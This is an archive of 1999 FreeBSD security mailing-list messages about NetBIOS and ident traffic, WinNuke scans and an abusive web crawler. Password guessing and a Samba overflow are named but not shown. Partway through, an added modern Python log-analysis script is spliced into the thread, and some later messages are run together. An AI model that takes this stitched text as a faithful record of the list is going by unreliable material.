Cc: des@flood.ping.uio.no, (Dag-Erling,Smorgrav), greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

nuqneH,

Ever seen netbios name requests from misconfigured servers (cretins like
www.intel.ru and so on)?

Kiril Mitev said :

> >
> > "Greg Quinlan" writes:
> > > So will it affect anything by opening port 113? ...(getting 2000 or so log
> > > entries from the same server)
> >
> > Don't log, or at least, don't log connections to ports to which you
> > expect benign (if misguided) traffic, such as auth and the netbios
> > ports.
>
> i beg to disagree, any access attempt from 'outside' to any netbios
> ports is 99% indicative of a break-in attempt.
>
> in my experience, at least

CU in Hell
/Arkan#iD
Do i believe in Bible? Hell,man,i've seen one!

From owner-freebsd-security Mon May 24 7:45: 4 1999
Delivered-To: freebsd-security@freebsd.org
Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id 6E55B14BD3 for ; Mon, 24 May 1999 07:43:41 -0700 (PDT) (envelope-from kiril@idea.co.uk)
Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id PAA03027; Mon, 24 May 1999 15:35:18 +0100 (BST)
From: Kiril Mitev
Message-Id: <199905241435.PAA03027@idea.co.uk>
Subject: Re: Server trying to connect to Port 113
To: ark@eltex.ru
Date: Mon, 24 May 1999 15:35:18 +0100 (BST)
Cc: kiril@ideaglobal.com, des@flood.ping.uio.no, eltex.ru@ideaglobal.com, greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG
In-Reply-To: <199905241437.SAA23349@paranoid.eltex.spb.ru> from "ark@eltex.ru" at May 24, 99 06:37:21 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Yes.

Ever seen scans of netbios ports across your whole DMZ ?

K

>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> nuqneH,
>
> Ever seen netbios name requests from misconfigured servers (cretins like
> www.intel.ru and so on)?
>
> Kiril Mitev said :
>
> > >
> > > "Greg Quinlan" writes:
> > > > So will it affect anything by opening port 113? ...(getting 2000 or so log
> > > > entries from the same server)
> > >
> > > Don't log, or at least, don't log connections to ports to which you
> > > expect benign (if misguided) traffic, such as auth and the netbios
> > > ports.
> >
> > i beg to disagree, any access attempt from 'outside' to any netbios
> > ports is 99% indicative of a break-in attempt.
> >
> > in my experience, at least
>
> CU in Hell
> /Arkan#iD
> Do i believe in Bible? Hell,man,i've seen one!
>

From owner-freebsd-security Mon May 24 7:45:26 1999
Delivered-To: freebsd-security@freebsd.org
Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 649E61537E for ; Mon, 24 May 1999 07:45:20 -0700 (PDT) (envelope-from ark@eltex.ru)
Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id SAA29971; Mon, 24 May 1999 18:45:09 +0400 (MSD)
Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Mon, 24 May 1999 18:44:34 +0400
Received: from undisclosed-intranet-sender id xma015066; Mon, 24 May 99 18:44:16 +0400
Date: Mon, 24 May 1999 18:44:07 +0400
Message-Id: <199905241444.SAA23381@paranoid.eltex.spb.ru>
In-Reply-To: <199905241435.PAA03027@idea.co.uk> from "Kiril Mitev "
From: ark@eltex.ru
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: Server trying to connect to Port 113
To: kiril@ideaglobal.com
Cc: eltex.ru@ideaglobal.com, greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG, ark@eltex.ru, des@flood.ping.uio.no
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

nuqneH,

Netbios session service, yes. Netbios datagram/name service, no.

Kiril Mitev said :

> Yes.
>
> Ever seen scans of netbios ports across your whole DMZ ?
>
> K
>
> > nuqneH,
> >
> > Ever seen netbios name requests from misconfigured servers (cretins like
> > www.intel.ru and so on)?
> >
> > Kiril Mitev said :
> >
> > > >
> > > > "Greg Quinlan" writes:
> > > > > So will it affect anything by opening port 113? ...(getting 2000 or so log
> > > > > entries from the same server)
> > > >
> > > > Don't log, or at least, don't log connections to ports to which you
> > > > expect benign (if misguided) traffic, such as auth and the netbios
> > > > ports.
> > >
> > > i beg to disagree, any access attempt from 'outside' to any netbios
> > > ports is 99% indicative of a break-in attempt.
> > >
> > > in my experience, at least

CU in Hell
/Arkan#iD
Do i believe in Bible? Hell,man,i've seen one!
From owner-freebsd-security Mon May 24 7:45:47 1999
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 59363153C6 for ; Mon, 24 May 1999 07:45:44 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id QAA90379; Mon, 24 May 1999 16:45:42 +0200 (CEST) (envelope-from des)
To: Kiril Mitev
Cc: greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG
Subject: Re: Server trying to connect to Port 113
References: <199905241422.PAA02615@idea.co.uk>
From: Dag-Erling Smorgrav
Date: 24 May 1999 16:45:41 +0200
In-Reply-To: Kiril Mitev's message of "Mon, 24 May 1999 15:22:29 +0100 (BST)"
Message-ID:
Lines: 18
X-Mailer: Gnus v5.5/Emacs 19.34
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kiril Mitev writes:
> > Don't log, or at least, don't log connections to ports to which you
> > expect benign (if misguided) traffic, such as auth and the netbios
> > ports.
> i beg to disagree, any access attempt from 'outside' to any netbios
> ports is 99% indicative of a break-in attempt.

Wrong on two points: most NetBIOS traffic is benign, and when it is an
attack, it's most likely a DoS and not a break-in. I don't know of any
way to gain access to a machine through NetBIOS services; I do however
know of several ways to kill Windows that way (most, if not all, are
not directly related to NetBIOS, but use the NetBIOS ports because
Windows is likely to be listening there). Chasing after script kiddies
who try to WinNuke a FreeBSD box is, IMHO, a total waste of energy.

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Mon May 24 7:46:59 1999
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 0B6A314BD3 for ; Mon, 24 May 1999 07:46:56 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id QAA90393; Mon, 24 May 1999 16:46:52 +0200 (CEST) (envelope-from des)
To: Kiril Mitev
Cc: ark@eltex.ru, eltex.ru@ideaglobal.com, greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG
Subject: Re: Server trying to connect to Port 113
References: <199905241435.PAA03027@idea.co.uk>
From: Dag-Erling Smorgrav
Date: 24 May 1999 16:46:51 +0200
In-Reply-To: Kiril Mitev's message of "Mon, 24 May 1999 15:35:18 +0100 (BST)"
Message-ID:
Lines: 9
X-Mailer: Gnus v5.5/Emacs 19.34
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kiril Mitev writes:
> Ever seen scans of netbios ports across your whole DMZ ?

WinNuke scans. Nothing to worry about, unless you run Windows (and if
you do, you have worse things to worry about).

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Mon May 24 7:56:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id C5FF214E89 for ; Mon, 24 May 1999 07:56:20 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au)
Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id AAA23607; Tue, 25 May 1999 00:26:15 +0930 (CST)
Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA32582; Tue, 25 May 1999 00:27:11 +0930
Date: Tue, 25 May 1999 00:27:11 +0930 (CST)
From: Kris Kennaway
X-Sender: kkennawa@bragg
To: Kiril Mitev
Cc: Dag-Erling Smorgrav , greg@qmpgmc.ac.uk, freebsd-security@freebsd.org
Subject: Re: Server trying to connect to Port 113
In-Reply-To: <199905241422.PAA02615@idea.co.uk>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 24 May 1999, Kiril Mitev wrote:

> > "Greg Quinlan" writes:
> > > So will it affect anything by opening port 113? ...(getting 2000 or so log
> > > entries from the same server)
> >
> > Don't log, or at least, don't log connections to ports to which you
> > expect benign (if misguided) traffic, such as auth and the netbios
> > ports.
>
> i beg to disagree, any access attempt from 'outside' to any netbios
> ports is 99% indicative of a break-in attempt.

Windows machines like to attempt NetBIOS connections to remote machines
in the Internet under certain circumstances when you attempt a TCP/IP
connection. I think it's the fault of Internet Exploder mostly - usually
it's port 137, but port 138 and 139 are seen occasionally (they're other
NetBIOS control ports). I think it's trying to do a WINS lookup in
parallel with your TCP connection or something. I see lots of outgoing
NetBIOS packets on my network, not just incoming ones.

To be sure, there are a lot of forged or malign packets floating around
as well, but they're not all bad.

I don't know what the heck is wrong with the Windows TCP stack, BTW[1].
I see all kinds of bizarre traffic outgoing from the machines on the LAN
at work (which isn't even that big). By far the strangest would have to
be a Lose'95 machine which likes to address its packets in reverse byte
order: 4.3.2.1 for 1.2.3.4. Go figure :-)

Kris

[1] Rhetorical question.

-----
"Never criticize anybody until you have walked a mile in their shoes,
because by that time you will be a mile away and have their shoes."
-- Unknown

From owner-freebsd-security Mon May 24 7:58:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id A9EF514E89 for ; Mon, 24 May 1999 07:58:51 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au)
Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id AAA23108; Tue, 25 May 1999 00:28:50 +0930 (CST)
Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA03461; Tue, 25 May 1999 00:29:42 +0930
Date: Tue, 25 May 1999 00:29:42 +0930 (CST)
From: Kris Kennaway
X-Sender: kkennawa@bragg
To: Joao Assad
Cc: freebsd-security@freebsd.org
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <37492DE5.2822267@domain.com.br>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 24 May 1999, Joao Assad wrote:

> > The Webmasters on this list may want to look over their logs to see
> > if they've been hit and not known it. grep your logs for imagelock.com;
> > if you find that they're abusing your server, you may want to firewall
> > them out and complain to ABOVE.NET.
>
> Damn, they scanned all my servers. I didn't check before because I thought
> they wouldn't be interested in a .br server.... Seems like they got here
> coming through our tucows mirror, and once they got in our network they
> started scanning all our servers.

750 hits on one of my small web servers last night. Didn't check the
others yet..

Kris

-----
"Never criticize anybody until you have walked a mile in their shoes,
because by that time you will be a mile away and have their shoes."
-- Unknown

From owner-freebsd-security Mon May 24 8: 1:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 0193E14E89 for ; Mon, 24 May 1999 08:01:21 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au)
Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id AAA23544; Tue, 25 May 1999 00:31:19 +0930 (CST)
Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA06575; Tue, 25 May 1999 00:32:14 +0930
Date: Tue, 25 May 1999 00:32:14 +0930 (CST)
From: Kris Kennaway
X-Sender: kkennawa@bragg
To: Dag-Erling Smorgrav
Cc: Kiril Mitev , greg@qmpgmc.ac.uk, freebsd-security@freebsd.org
Subject: Re: Server trying to connect to Port 113
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 24 May 1999, Dag-Erling Smorgrav wrote:

> Wrong on two points: most NetBIOS traffic is benign, and when it is an
> attack, it's most likely a DoS and not a break-in. I don't know of any
> way to gain access to a machine through NetBIOS services; I do however

Except for guessing a share password - see ports/security/nbaudit.
Reason enough to block all traffic on ports 137-139 on your firewall,
WinNukes notwithstanding.

Kris

-----
"Never criticize anybody until you have walked a mile in their shoes,
because by that time you will be a mile away and have their shoes."
-- Unknown

From owner-freebsd-security Mon May 24 8: 2: 4 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.siol.net (odin.siol.net [193.189.160.10]) by hub.freebsd.org (Postfix) with ESMTP id 2151C15409 for ; Mon, 24 May 1999 08:01:59 -0700 (PDT) (envelope-from tomaz.borstnar@over.net)
Received: from hang ([212.30.94.134]) by mail.siol.net (Post.Office MTA v3.5.3 release 223 ID# 620-58654U60000L60000S0V35) with ESMTP id net; Mon, 24 May 1999 17:01:55 +0200
Message-Id: <4.2.0.54.19990524164739.00dd1240@193.189.189.100>
X-Sender: tmail@193.189.189.100
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.54 (Beta)
Date: Mon, 24 May 1999 16:48:26 +0200
To: Theo Purmer
From: Tomaz Borstnar
Subject: Re: why not take this a little further (proposal)
Cc: "'freebsd-security@FreeBSD.ORG'"
In-Reply-To: <01BEA5CD.798B3EC0@theo.tepucom.nl>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 12:09 24.5.99 , Theo Purmer wrote the following message:
>Why not take this a little further and setup a "place"
>where these forms of abuse can be reported and

Try "Internet robots discussion " list.

Tomaz
----
Tomaz Borstnar
"Love is the answer to the final question you ask" - Unknown

From owner-freebsd-security Mon May 24 8:30:48 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 5F48B14C8C for ; Mon, 24 May 1999 08:30:44 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA03885; Mon, 24 May 1999 09:29:06 -0600 (MDT)
Message-Id: <4.2.0.37.19990524092545.0474cd50@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Mon, 24 May 1999 09:28:08 -0600
To: Joao Assad , freebsd-security@FreeBSD.ORG
From: Brett Glass
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <37492DE5.2822267@domain.com.br>
References: <199905231424140440.0E81E3D5@quaggy.ursine.com> <4.2.0.37.19990523191423.04639500@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 10:45 AM 5/24/99 +0000, Joao Assad wrote:

>In my logs I see a 10 secs interval between each request.

In some of the ones I administer, it was 3 seconds or
less. And it ramps up, as if one of their scavengers
feeds URLs to the others.

So much for the 3-10 minutes they claim!

--Brett Glass

From owner-freebsd-security Mon May 24 8:45:12 1999
Delivered-To: freebsd-security@freebsd.org
Received: from alive.znep.com (sense-sea-MegaSub-1-222.oz.net [216.39.144.222]) by hub.freebsd.org (Postfix) with ESMTP id EA5CA14C8C for ; Mon, 24 May 1999 08:45:09 -0700 (PDT) (envelope-from marcs@znep.com)
Received: from localhost (marcs@localhost) by alive.znep.com (8.9.1/8.9.1) with ESMTP id IAA25267; Mon, 24 May 1999 08:50:08 -0700 (PDT) (envelope-from marcs@znep.com)
Date: Mon, 24 May 1999 08:50:08 -0700 (PDT)
From: Marc Slemko
To: Brett Glass
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <4.2.0.37.19990524092545.0474cd50@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 24 May 1999, Brett Glass wrote:

> At 10:45 AM 5/24/99 +0000, Joao Assad wrote:
>
> >In my logs I see a 10 secs interval between each request.
>
> In some of the ones I administer, it was 3 seconds or
> less. And it ramps up, as if one of their scavengers
> feeds URLs to the others.
>
> So much for the 3-10 minutes they claim!

3-10 minutes? Ha. I was seeing 10-20 hits per second on some machines,
with hundreds of thousands of hits per day.

Their robot is broken because it doesn't follow proper robot etiquette
(eg. robots.txt, using a reasonable useragent, etc.), it does not behave
like a "nice" robot should to lessen resource use, it apparently has no
methods in place to stop it from crawling infinite loops in CGI scripts
or other dynamic content, plus it is horribly dumb and appears to like
randomly adding '/'s onto the end of URLs to see if it gets anything
useful, plus it can't even parse HTML properly half the time.
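The robot behaviour Marc lists can be checked for in an access log rather than by eyeballing it, as an added example that is not code from anyone in this thread: per client it measures the request rate, counts hits on robots.txt-disallowed paths (such as webpoison trap pages) and counts the "append a '/' and retry" probes. It assumes Apache combined log format; the log lines, the robots.txt and the addresses are constructed.

```python
"""Spot a misbehaving crawler in a web server access log.
Added example, not from the thread. Assumes Apache combined log format;
the sample log, robots.txt and addresses below are constructed."""
import re
from collections import defaultdict
from datetime import datetime

CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "(?P<ua>[^"]*)")?$'
)


def parse_robots_disallow(text):
    """Disallow prefixes from the 'User-agent: *' group(s) of a robots.txt.
    Simplification: only the wildcard group is honoured, which is enough to
    tell whether a client respects robots.txt at all."""
    prefixes, in_star, new_group = [], False, True
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            if new_group:                 # first UA line opens a new group
                in_star, new_group = False, False
            in_star = in_star or value == "*"
        else:
            new_group = True
            if key == "disallow" and in_star and value:
                prefixes.append(value)
    return prefixes


def parse_clf(lines):
    """Yield (host, timestamp, path, user_agent) for each parseable line."""
    for line in lines:
        m = CLF_RE.match(line.rstrip("\n"))
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield m["host"], ts, m["path"], m["ua"] or "-"


def profile_clients(lines, disallow_prefixes):
    """Per client: request count, smallest gap between requests, peak requests
    in one second, robots.txt violations, trailing-slash probes, missing UA."""
    by_host = defaultdict(list)
    for host, ts, path, ua in parse_clf(lines):
        by_host[host].append((ts, path, ua))
    profiles = {}
    for host, reqs in by_host.items():
        reqs.sort()
        p = {"requests": len(reqs), "min_interval_s": None, "peak_per_second": 0,
             "disallowed_hits": 0, "slash_probes": 0, "no_user_agent": False}
        per_second, seen, prev = defaultdict(int), set(), None
        for ts, path, ua in reqs:
            if prev is not None:
                gap = (ts - prev).total_seconds()
                p["min_interval_s"] = gap if p["min_interval_s"] is None else min(p["min_interval_s"], gap)
            prev = ts
            per_second[ts.replace(microsecond=0)] += 1
            if any(path.startswith(d) for d in disallow_prefixes):
                p["disallowed_hits"] += 1
            # the robot in the thread re-requests URLs with a '/' appended
            if path != "/" and path.endswith("/") and path[:-1] in seen:
                p["slash_probes"] += 1
            seen.add(path)
            if ua == "-":
                p["no_user_agent"] = True
        p["peak_per_second"] = max(per_second.values())
        profiles[host] = p
    return profiles


def flag_abusive(profiles, max_per_second=5):
    """Clients that ignore robots.txt, probe with trailing slashes, or exceed the rate."""
    return sorted(h for h, p in profiles.items()
                  if p["disallowed_hits"] or p["slash_probes"]
                  or p["peak_per_second"] > max_per_second)


ROBOTS_TXT = """\
# constructed sample
User-agent: *
Disallow: /cgi-bin/
Disallow: /poison/   # webpoison trap pages, invisible to humans
"""

SAMPLE_LOG = """\
203.0.113.40 - - [24/May/1999:03:12:01 -0300] "GET / HTTP/1.0" 200 1534 "-" "polite-bot/1.0"
203.0.113.40 - - [24/May/1999:03:12:11 -0300] "GET /robots.txt HTTP/1.0" 200 61 "-" "polite-bot/1.0"
198.51.100.17 - - [24/May/1999:03:15:00 -0300] "GET / HTTP/1.0" 200 1534 "-" "-"
198.51.100.17 - - [24/May/1999:03:15:00 -0300] "GET /about HTTP/1.0" 200 812 "-" "-"
198.51.100.17 - - [24/May/1999:03:15:00 -0300] "GET /about/ HTTP/1.0" 404 210 "-" "-"
198.51.100.17 - - [24/May/1999:03:15:01 -0300] "GET /poison/a1b2.html HTTP/1.0" 200 3300 "-" "-"
198.51.100.17 - - [24/May/1999:03:15:01 -0300] "GET /poison/c3d4.html HTTP/1.0" 200 3301 "-" "-"
"""

if __name__ == "__main__":
    prof = profile_clients(SAMPLE_LOG.splitlines(), parse_robots_disallow(ROBOTS_TXT))
    for host in flag_abusive(prof):
        print(host, prof[host])
```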
From owner-freebsd-security Mon May 24 8:51:32 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 7F95C14C8C for ; Mon, 24 May 1999 08:51:31 -0700 (PDT) (envelope-from hart@iserver.com)
Received: by gatekeeper.iserver.com; Mon, 24 May 1999 09:51:30 -0600 (MDT)
Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma007157; Mon, 24 May 99 09:51:03 -0600
Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.2) id JAA10648; Mon, 24 May 1999 09:50:27 -0600 (MDT)
Date: Mon, 24 May 1999 09:50:27 -0600 (MDT)
From: Paul Hart
X-Sender: hart@anchovy.orem.iserver.com
To: Dag-Erling Smorgrav
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Server trying to connect to Port 113
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 24 May 1999, Dag-Erling Smorgrav wrote:

> I don't know of any way to gain access to a machine through NetBIOS
> services;

What about the remote root overflow exploit for Samba a while back?

Paul Hart

--
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security Mon May 24 8:54:50 1999
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 6DB4B153EA for ; Mon, 24 May 1999 08:54:47 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id RAA90661; Mon, 24 May 1999 17:54:44 +0200 (CEST) (envelope-from des)
To: Paul Hart
Cc: Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG
Subject: Re: Server trying to connect to Port 113
References:
From: Dag-Erling Smorgrav
Date: 24 May 1999 17:54:43 +0200
In-Reply-To: Paul Hart's message of "Mon, 24 May 1999 09:50:27 -0600 (MDT)"
Message-ID:
Lines: 12
X-Mailer: Gnus v5.5/Emacs 19.34
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Paul Hart writes:
> On 24 May 1999, Dag-Erling Smorgrav wrote:
> > I don't know of any way to gain access to a machine through NetBIOS
> > services;
> What about the remote root overflow exploit for Samba a while back?

It does not invalidate my claim of not *knowing* of any way to gain
access to a machine through NetBIOS services :)

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Mon May 24 8:57:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id EDA22153EA for ; Mon, 24 May 1999 08:55:54 -0700 (PDT) (envelope-from kiril@idea.co.uk)
Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id QAA05550; Mon, 24 May 1999 16:48:45 +0100 (BST)
From: Kiril Mitev
Message-Id: <199905241548.QAA05550@idea.co.uk>
Subject: Re: Server trying to connect to Port 113
To: ark@eltex.ru
Date: Mon, 24 May 1999 16:48:45 +0100 (BST)
Cc: kiril@ideaglobal.com, eltex.ru@ideaglobal.com, greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG, des@flood.ping.uio.no
In-Reply-To: <199905241444.SAA23381@paranoid.eltex.spb.ru> from "ark@eltex.ru" at May 24, 99 06:44:07 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Worry or not, those logs were wot it took to get big boss to buy real
router :-)

K

>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> nuqneH,
>
> Netbios session service, yes. Netbios datagram/name service, no.
>
> Kiril Mitev said :
>
> > Yes.
> >
> > Ever seen scans of netbios ports across your whole DMZ ?
> >
> > K
> >
> > > nuqneH,
> > >
> > > Ever seen netbios name requests from misconfigured servers (cretins like
> > > www.intel.ru and so on)?
> > >
> > > Kiril Mitev said :
> > >
> > > > >
> > > > > "Greg Quinlan" writes:
> > > > > > So will it affect anything by opening port 113? ...(getting 2000 or so log
> > > > > > entries from the same server)
> > > > >
> > > > > Don't log, or at least, don't log connections to ports to which you
> > > > > expect benign (if misguided) traffic, such as auth and the netbios
> > > > > ports.
> > > >
> > > > i beg to disagree, any access attempt from 'outside' to any netbios
> > > > ports is 99% indicative of a break-in attempt.
> > > >
> > > > in my experience, at least
>
> CU in Hell
> /Arkan#iD
> Do i believe in Bible? Hell,man,i've seen one!
> > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3i > Charset: noconv > > iQCVAwUBN0lltaH/mIJW9LeBAQHOlQP+Kq4iYkQAbMh2ggXD8FV64bDxfW7t8gOR > x6ASa5w9nHdyuOHXDcIFYp9jmJCV2tPfZitgU5wbZ1nGdxwf+AHmB15y2I6m8X4/ > qQdZduBGFYrCk4w50F4FS25n4TcIJcedEihCOMQoMGUfurclOsIIPmbgGNh3ZJxE > JFZAUDdZo/0= > =yKmu > -----END PGP SIGNATURE----- > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 24 9: 3:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.mt.sri.com (sri-gw.MT.net [206.127.105.141]) by hub.freebsd.org (Postfix) with ESMTP id 02C3614BD4 for ; Mon, 24 May 1999 09:03:27 -0700 (PDT) (envelope-from nate@mt.sri.com) Received: from mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by ns.mt.sri.com (8.8.8/8.8.8) with SMTP id KAA09671; Mon, 24 May 1999 10:03:18 -0600 (MDT) (envelope-from nate@rocky.mt.sri.com) Received: by mt.sri.com (SMI-8.6/SMI-SVR4) id KAA11763; Mon, 24 May 1999 10:03:17 -0600 Date: Mon, 24 May 1999 10:03:17 -0600 Message-Id: <199905241603.KAA11763@mt.sri.com> 
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Dag-Erling Smorgrav
Cc: "Bert Kellerman" , "Matthew Dillon" ,
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To:
References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> <009401bea570$09546a80$5f64a8c0@crackhouse.com>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> "Bert Kellerman" writes:
> > You need UDP connectivity to perform a successful traceroute from a UNIX
> > client..not TCP. [...]
>
> Bullshit. RTFM.

DES, you don't know what you're talking about. A ping doesn't require
UDP, but traceroute certainly does.

Nate

From owner-freebsd-security Mon May 24 9: 8:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id CA00615452 for ; Mon, 24 May 1999 09:08:16 -0700 (PDT) (envelope-from sthaug@nethelp.no)
Received: (qmail 32726 invoked by uid 1001); 24 May 1999 16:08:15 +0000 (GMT)
To: nate@mt.sri.com
Cc: security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
From: sthaug@nethelp.no
